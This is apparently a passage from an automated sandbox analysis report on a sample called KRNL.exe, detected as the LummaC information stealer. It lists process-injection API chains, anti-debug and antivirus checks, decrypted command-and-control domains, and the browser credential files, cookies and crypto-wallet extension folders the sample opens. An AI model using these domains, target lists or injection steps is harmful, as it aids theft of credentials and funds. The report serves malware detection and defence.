                    Source: C:\Users\user\Desktop\KRNL.exeAPI call chain: ExitProcess graph end nodegraph_2-33932
                    Source: C:\Users\user\Desktop\KRNL.exeProcess information queried: ProcessInformationJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_0043CD20 LdrInitializeThunk,2_2_0043CD20
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006EF8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006EF8E9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_0071A19E mov edi, dword ptr fs:[00000030h]0_2_0071A19E
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006E1FB0 mov edi, dword ptr fs:[00000030h]0_2_006E1FB0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006E1FB0 mov edi, dword ptr fs:[00000030h]2_2_006E1FB0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006FD8E0 GetProcessHeap,0_2_006FD8E0
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006EF52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_006EF52D
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006EF8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006EF8E9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006EF8DD SetUnhandledExceptionFilter,0_2_006EF8DD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006F7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_006F7E30
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006EF52D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_006EF52D
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006EF8E9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006EF8E9
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006EF8DD SetUnhandledExceptionFilter,2_2_006EF8DD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 2_2_006F7E30 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_006F7E30

                    HIPS / PFW / Operating System Protection Evasion

                    barindex
                    Contains functionality to inject code into remote processes
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_0071A19E GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateProcessW,CreateProcessW,VirtualAlloc,VirtualAlloc,GetThreadContext,Wow64GetThreadContext,ReadProcessMemory,ReadProcessMemory,VirtualAllocEx,VirtualAllocEx,GetProcAddress,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,Wow64SetThreadContext,ResumeThread,ResumeThread,0_2_0071A19E
                    Injects a PE file into a foreign processes
                    Source: C:\Users\user\Desktop\KRNL.exeMemory written: C:\Users\user\Desktop\KRNL.exe base: 400000 value starts with: 4D5AJump to behavior
                    LummaC encrypted strings found
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: hummskitnj.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: cashfuzysao.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: appliacnesot.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: screwamusresz.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: inherineau.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: scentniej.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: rebuildeso.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: prisonyfork.buzz
                    Source: KRNL.exe, 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: mindhandru.buzz
                    Source: C:\Users\user\Desktop\KRNL.exeProcess created: C:\Users\user\Desktop\KRNL.exe "C:\Users\user\Desktop\KRNL.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: EnumSystemLocalesW,0_2_006FD1BD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,0_2_00701287
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: EnumSystemLocalesW,0_2_007014D8
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,0_2_00701580
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: EnumSystemLocalesW,0_2_007017D3
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,0_2_00701840
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,0_2_00701960
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: EnumSystemLocalesW,0_2_00701915
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_00701A07
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,0_2_00701B0D
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,0_2_006FCC15
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: EnumSystemLocalesW,2_2_006FD1BD
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00701287
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: EnumSystemLocalesW,2_2_007014D8
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00701580
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: EnumSystemLocalesW,2_2_007017D3
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,2_2_00701840
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,2_2_00701960
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: EnumSystemLocalesW,2_2_00701915
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_00701A07
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,2_2_00701B0D
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: GetLocaleInfoW,2_2_006FCC15
                    Source: C:\Users\user\Desktop\KRNL.exeQueries volume information: C:\ VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeCode function: 0_2_006F00B4 GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,GetSystemTimeAsFileTime,0_2_006F00B4
                    Source: C:\Users\user\Desktop\KRNL.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
                    Source: KRNL.exe, 00000002.00000003.1976890658.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1765217238.0000000003342000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1765441778.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1976367913.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000002.2915821353.0000000003383000.00000004.00000020.00020000.00000000.sdmp, KRNL.exe, 00000002.00000003.1821869308.0000000003383000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\Desktop\KRNL.exeWMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    barindex
                    Yara detected LummaC Stealer
                    Source: Yara matchFile source: Process Memory Space: KRNL.exe PID: 2120, type: MEMORYSTR
                    Source: Yara matchFile source: 2.2.KRNL.exe.400000.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 2.2.KRNL.exe.400000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000002.00000002.2915370976.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1676084823.00000000043BD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                    Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                    Found many strings related to Crypto-Wallets (likely being stolen)
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/Electrum
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/ElectronCash
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: window-state.json
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Wallets/JAXX New Version
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Exodus\exodus.wallet
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: ExodusWeb3
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: %appdata%\Ethereum
                    Source: KRNL.exe, 00000002.00000003.1765127023.00000000033CF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: \??\C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsl
                    Source: KRNL.exe, 00000002.00000003.1751999595.0000000003383000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: 0}"}],"c":[{"t":0,"p":"%appdata%\\Ethereum","m":["keystore"],"z":"Wallets/Ethereum","d":1,"fs":20971520},{"t":0,"p":"%appdata%\\Exodus\\exodus.wallet","m":["*"],"z":"Wallets/Exodus","d":0,"fs":20971520},{"t":0,"p":"%appdata%\\Ledger Live","m":["*"]
                    Tries to harvest and steal browser information (history, passwords, etc)
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnmJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajbJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappaflnJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdmJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\prefs.jsJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdoJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopgJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdphJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkldJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolafJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnidJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfciJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjehJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemgJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhaeJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\key4.dbJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliofJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneecJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmonJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejbalbakoplchlghecdalmeeeajnimhmJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcmJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjhJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\abogmiocnneedmmepnohnhlijcjpcifdJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflcJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbgJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahdJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kjmoohlgokccodicjjfebfomlbljgfhkJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HistoryJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgnJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpiJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\places.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifbJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgkJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\bhghoamapcdpbohphigoooaddinpkbaiJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkdJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimnJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfjJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cphhlgmgameodnhkjdmkpanlelnlohaoJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For AccountJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjkJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnfJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofecJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihdJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcjeJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaocJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdnoJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\infeboajgfhgbjpjbeppbkgnabfdkdafJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cert9.dbJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkmJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\formhistory.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbicJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoaddJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\heefohaffomkkkphnlpohglngmbcclhiJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeapJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihohJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbnJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaadJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.jsonJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilcJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclgJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                    Source: C:\Users\user\Desktop\KRNL.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
